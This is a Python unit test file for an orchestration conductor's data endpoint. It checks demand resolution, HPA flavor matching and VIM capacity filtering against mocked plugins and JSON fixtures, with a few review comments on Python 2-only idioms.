                          'resolved_demands': [{'service_resource_id': 'vFW-SINK-XX', 'vlan_key': 'vlan_key',
                                                'inventory_provider': 'aai', 'inventory_type': 'vfmodule',
                                                'excluded_candidates': [
                                                    {'candidate_id': 'e765d576-8755-4145-8536-0bb6d9b1dc9a',
                                                     'inventory_type': 'vfmodule'
                                                     }], 'port_key': 'vlan_port', 'service_type': 'vFW-SINK-XX',
                                                'attributes': {'global-customer-id': 'Demonstration',
                                                               'cloud-region-id': {'get_param': 'chosen_region'},
                                                               'model-version-id':
                                                                   '763731df-84fd-494b-b824-01fc59a5ff2d',
                                                               'prov-status': 'ACTIVE',
                                                               'service_instance_id': {'get_param': 'service_id'},
                                                               'model-invariant-id':
                                                                   'e7227847-dea6-4374-abca-4561b070fe7d',
                                                               'orchestration-status': ['active']
                                                               }
                                                }]
                          }, 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.resolve_demands(ctxt, req_json))

    @mock.patch.object(service.LOG, 'error')
    @mock.patch.object(service.LOG, 'info')
    @mock.patch.object(stevedore.ExtensionManager, 'names')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    def test_get_candidates_with_hpa(self, hpa_mock, ext_mock1,
                                     info_mock, error_mock):
        # HPA flavor matching: a matched flavor annotates the candidate;
        # empty or malformed flavor results drop it
        req_json_file = './conductor/tests/unit/data/candidate_list.json'
        hpa_json_file = './conductor/tests/unit/data/hpa_constraints.json'
        hpa_json = yaml.safe_load(open(hpa_json_file).read())
        req_json = yaml.safe_load(open(req_json_file).read())
        candidate_list = req_json['candidate_list']
        # NOTE(review): dict.items()[0] only works on Python 2
        (constraint_id, constraint_info) = \
            hpa_json["conductor_solver"]["constraints"][0].items()[0]
        hpa_constraint = constraint_info['properties']
        flavorProperties = hpa_constraint['evaluate'][0]['flavorProperties']
        # NOTE(review): `id` and `type` shadow builtins here
        id = hpa_constraint['evaluate'][0]['id']
        type = hpa_constraint['evaluate'][0]['type']
        directives = hpa_constraint['evaluate'][0]['directives']
        attr = directives[0].get("attributes")
        label_name = attr[0].get("attribute_name")
        ext_mock1.return_value = ['aai']
        flavor_info = {"flavor-id": "vim-flavor-id1",
                       "flavor-name": "vim-flavor-name1"}
        directive = [
            {
                "id": id,
                "type": type,
                "directives": directives
            }
        ]
        hpa_mock.return_value = [flavor_info]
        self.maxDiff = None
        args = generate_args(candidate_list, flavorProperties, id, type, directives)
        hpa_candidate_list = copy.deepcopy(candidate_list)
        hpa_candidate_list[1]['flavor_map'] = {}
        hpa_candidate_list[1]['flavor_map'][label_name] = "vim-flavor-name1"
        hpa_candidate_list[1]['all_directives'] = {}
        hpa_candidate_list[1]['all_directives']['directives'] = directive
        hpa_candidate_list1 = []
        hpa_candidate_list1.append(hpa_candidate_list[0])
        expected_response = {'response': hpa_candidate_list1, 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_with_hpa(None, args))
        # No flavor returned -> only the non-HPA candidate survives
        hpa_candidate_list2 = list()
        hpa_candidate_list2.append(copy.deepcopy(candidate_list[0]))
        args = generate_args(candidate_list, flavorProperties, id, type, directives)
        hpa_mock.return_value = []
        expected_response = {'response': hpa_candidate_list2, 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_with_hpa(None, args))
        # Malformed flavor dicts (empty / blank name / missing name) likewise
        flavor_info = {}
        hpa_mock.return_value = [flavor_info]
        expected_response = {'response': hpa_candidate_list2, 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_with_hpa(None, args))
        flavor_info = {"flavor-id": "vim-flavor-id1",
                       "flavor-name": ""}
        hpa_mock.return_value = [flavor_info]
        expected_response = {'response': hpa_candidate_list2, 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_with_hpa(None, args))
        flavor_info = {"flavor-id": "vim-flavor-id1"}
        hpa_mock.return_value = [flavor_info]
        expected_response = {'response': hpa_candidate_list2, 'error': False}
        self.assertEqual(expected_response,
                         self.data_ep.get_candidates_with_hpa(None, args))

    @mock.patch.object(service.LOG, 'warn')
    @mock.patch.object(service.LOG, 'info')
    @mock.patch.object(stevedore.ExtensionManager, 'names')
    @mock.patch.object(stevedore.ExtensionManager, 'map_method')
    def test_get_candidates_with_vim_capacity(self, vim_mock, ext_mock1,
                                              info_mock, warn_mock):
        # VIM capacity filtering: a listed vim id keeps the candidate;
        # None/empty plugin results are errors; an empty vim list filters all
        req_json_file = './conductor/tests/unit/data/candidate_list.json'
        hpa_json_file = './conductor/tests/unit/data/hpa_constraints.json'
        hpa_json = yaml.safe_load(open(hpa_json_file).read())
        req_json = yaml.safe_load(open(req_json_file).read())
        candidate_list = req_json['candidate_list']
        ext_mock1.return_value = ['MultiCloud']
        (constraint_id, constraint_info) = \
            hpa_json["conductor_solver"]["constraints"][2].items()[0]
        vim_request = constraint_info['properties']['request']
        ctxt = {}
        candidate_list_copy = list(copy.deepcopy(candidate_list))
        args = {"candidate_list": [candidate_list_copy[1]],
                "request": vim_request}
        vim_mock.return_value = [['att-aic_NYCNY55']]
        self.assertEqual({'response': [candidate_list[1]], 'error': False},
                         self.data_ep.get_candidates_with_vim_capacity(ctxt,
                                                                       args))
        vim_mock.return_value = []
        self.assertEqual({'response': [candidate_list[1]], 'error': True},
                         self.data_ep.get_candidates_with_vim_capacity(ctxt,
                                                                       args))
        vim_mock.return_value = [None]
        self.assertEqual({'response': [candidate_list[1]], 'error': True},
                         self.data_ep.get_candidates_with_vim_capacity(ctxt,
                                                                       args))
        vim_mock.return_value = None
        self.assertEqual({'response': [candidate_list[1]], 'error': True},
                         self.data_ep.get_candidates_with_vim_capacity(ctxt,
                                                                       args))
        vim_mock.return_value = [[]]
        self.assertEqual({'response': [], 'error': False},
                         self.data_ep.get_candidates_with_vim_capacity(ctxt,
                                                                       args))
def generate_args(candidate_list, flavorProperties, vf_id, model_type, directives):
    """Assemble the argument dict expected by get_candidates_with_hpa.

    The candidate list is deep-copied so the endpoint under test can never
    mutate the caller's fixture data.
    """
    return {
        "candidate_list": copy.deepcopy(candidate_list),
        "flavorProperties": flavorProperties,
        "id": vf_id,
        "type": model_type,
        "directives": directives,
    }
def ip_ext_sideeffect(*args, **kwargs):
    """Fake inventory-provider dispatch used as a mock side_effect.

    Mirrors the plugin manager's map_method contract: the first positional
    argument names the provider call, keyword arguments carry its inputs.

    Returns:
        None for network role 'role-1' (simulating "no region found"),
        a canned region list for any other role, a canned candidate role
        for 'check_candidate_role', and None (implicitly) for any other
        call name.
    """
    # The original loaded constraints.json here into locals that were never
    # used; the dead file read (which also leaked its file handle) has been
    # removed so this side effect is pure and has no filesystem dependency.
    if args[0] == 'check_network_roles':
        if kwargs['network_role_id'] == 'role-1':
            return None
        return ['DLLSTX55']
    elif args[0] == 'check_candidate_role':
        return ['candidate-role0']
if __name__ == "__main__":
unittest.main()
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.